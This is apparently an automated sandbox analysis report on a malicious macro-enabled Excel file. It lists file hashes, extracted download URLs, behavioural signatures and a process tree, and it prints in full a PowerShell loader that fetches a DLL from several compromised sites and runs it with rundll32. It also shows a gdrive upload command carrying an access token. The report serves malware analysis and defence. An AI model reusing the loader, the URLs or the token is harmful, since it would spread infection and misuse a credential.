Analysis
-
max time kernel
470s -
max time network
614s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
25-11-2021 16:48
Static task
static1
Behavioral task
behavioral1
Sample
pload/865663204559_17_Nov_2021.xlsm
Resource
win10-en-20211104
General
-
Target
pload/865663204559_17_Nov_2021.xlsm
-
Size
44KB
-
MD5
477fd718bb764ffe3c5afde16c6c8dd2
-
SHA1
eb932e19d95f88d64270d40cdc0b92c6d1cf63be
-
SHA256
ee880ebdf26a1bcebe70a7ba17659199833c6107d758e26d37502bed9a225ee3
-
SHA512
f7d0451ca3670179cc93a680b99f8982204c43054c55eb479c38dc8ea0ba6ba5b6ebea4508569091c07d95a759841455605e6daeab445146b29fc1af377ba267
Malware Config
Extracted
https://evgeniys.ru/sap-logs/D6/
http://crownadvertising.ca/wp-includes/OxiAACCoic/
https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/
http://immoinvest.com.br/blog_old/wp-admin/luoT/
https://yoho.love/wp-content/e4laFBDXIvYT6O/
https://www.168801.xyz/wp-content/6J3CV4meLxvZP/
https://www.pasionportufuturo.pe/wp-content/XUBS/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4688 4196 cmd.exe EXCEL.EXE -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates processes with tasklist 1 TTPs 3 IoCs
Processes:
tasklist.exetasklist.exetasklist.exepid process 2388 tasklist.exe 508 tasklist.exe 3608 tasklist.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 4196 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
procdump64.exepid process 3032 procdump64.exe 3032 procdump64.exe 3032 procdump64.exe 3032 procdump64.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
tasklist.exeprocdump64.exetasklist.exetasklist.exedescription pid process Token: SeDebugPrivilege 2388 tasklist.exe Token: SeDebugPrivilege 3032 procdump64.exe Token: SeDebugPrivilege 508 tasklist.exe Token: SeDebugPrivilege 3608 tasklist.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE 4196 EXCEL.EXE -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
EXCEL.EXEcmd.execmd.execmd.exedescription pid process target process PID 4196 wrote to memory of 4688 4196 EXCEL.EXE cmd.exe PID 4196 wrote to memory of 4688 4196 EXCEL.EXE cmd.exe PID 4688 wrote to memory of 5116 4688 cmd.exe powershell.exe PID 4688 wrote to memory of 5116 4688 cmd.exe powershell.exe PID 2840 wrote to memory of 2388 2840 cmd.exe tasklist.exe PID 2840 wrote to memory of 2388 2840 cmd.exe tasklist.exe PID 2840 wrote to memory of 3032 2840 cmd.exe procdump64.exe PID 2840 wrote to memory of 3032 2840 cmd.exe procdump64.exe PID 2840 wrote to memory of 3012 2840 cmd.exe cmd.exe PID 2840 wrote to memory of 3012 2840 cmd.exe cmd.exe PID 3012 wrote to memory of 3496 3012 cmd.exe cscript.exe PID 3012 wrote to memory of 3496 3012 cmd.exe cscript.exe PID 2840 wrote to memory of 3352 2840 cmd.exe gdrive.exe PID 2840 wrote to memory of 3352 2840 cmd.exe gdrive.exe PID 2840 wrote to memory of 508 2840 cmd.exe tasklist.exe PID 2840 wrote to memory of 508 2840 cmd.exe tasklist.exe PID 2840 wrote to memory of 1720 2840 cmd.exe find.exe PID 2840 wrote to memory of 1720 2840 cmd.exe find.exe PID 2840 wrote to memory of 3608 2840 cmd.exe tasklist.exe PID 2840 wrote to memory of 3608 2840 cmd.exe tasklist.exe PID 2840 wrote to memory of 3172 2840 cmd.exe findstr.exe PID 2840 wrote to memory of 3172 2840 cmd.exe findstr.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\pload\865663204559_17_Nov_2021.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj3⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\pload\procdump64.exeprocdump64.exe -ma 51162⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cscript.exe dec.vbs2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cscript.execscript.exe dec.vbs3⤵
-
C:\Users\Admin\AppData\Local\Temp\pload\gdrive.exegdrive.exe upload --access-token ya29.a0ARrdaM_WSt9QajZZv3IKyl2VX_GATva1IaeDQ6qFo-YL5glldk78310Im4EJo6o9gV608PCv8sDwe4S1DD645RGDCzdvrQa_7T88OxlVlUDmzvfSZfOUlPEjSK5MH7--hQSmX7NTPxUkRzq3X0fBXJAoooDX -p 1NUiA818Vwo-I0Ls9NNaWb8pM5y8SLuXG powershell.exe_211125_165032.dmp2⤵
-
C:\Windows\system32\tasklist.exetasklist2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind power2⤵
-
C:\Windows\system32\tasklist.exetasklist2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\findstr.exefindstr power2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\pload\powershell.exe_211125_165032.dmpMD5
3395357e8a5bc60cc0bd413eaa0cd39a
SHA14de70b8b48f0a9d2685671fd48decf3a2897f644
SHA2563e5c7112ccdf2be377b4af5b42515e42f703089482008de2de40276bbcc90c0e
SHA512be1eeb8314b7d1e44699742cb152da51a9ddc5ca821f2b24062c0ce3062a6b4a04c4b72e7553b80f4ee349ae6c200edf22db6f67217fbaaffbc3f6697202df66
-
memory/508-312-0x0000000000000000-mapping.dmp
-
memory/1720-313-0x0000000000000000-mapping.dmp
-
memory/2388-306-0x0000000000000000-mapping.dmp
-
memory/3012-308-0x0000000000000000-mapping.dmp
-
memory/3032-307-0x0000000000000000-mapping.dmp
-
memory/3172-315-0x0000000000000000-mapping.dmp
-
memory/3352-310-0x0000000000000000-mapping.dmp
-
memory/3496-309-0x0000000000000000-mapping.dmp
-
memory/3608-314-0x0000000000000000-mapping.dmp
-
memory/4196-120-0x00007FF8F8280000-0x00007FF8F8290000-memory.dmpFilesize
64KB
-
memory/4196-118-0x00007FF8F8280000-0x00007FF8F8290000-memory.dmpFilesize
64KB
-
memory/4196-130-0x00007FF8F8280000-0x00007FF8F8290000-memory.dmpFilesize
64KB
-
memory/4196-121-0x00007FF8F8280000-0x00007FF8F8290000-memory.dmpFilesize
64KB
-
memory/4196-123-0x000001C5CCDF0000-0x000001C5CCDF2000-memory.dmpFilesize
8KB
-
memory/4196-119-0x00007FF8F8280000-0x00007FF8F8290000-memory.dmpFilesize
64KB
-
memory/4196-124-0x000001C5CCDF0000-0x000001C5CCDF2000-memory.dmpFilesize
8KB
-
memory/4196-122-0x000001C5CCDF0000-0x000001C5CCDF2000-memory.dmpFilesize
8KB
-
memory/4688-290-0x0000000000000000-mapping.dmp
-
memory/5116-295-0x0000000000000000-mapping.dmp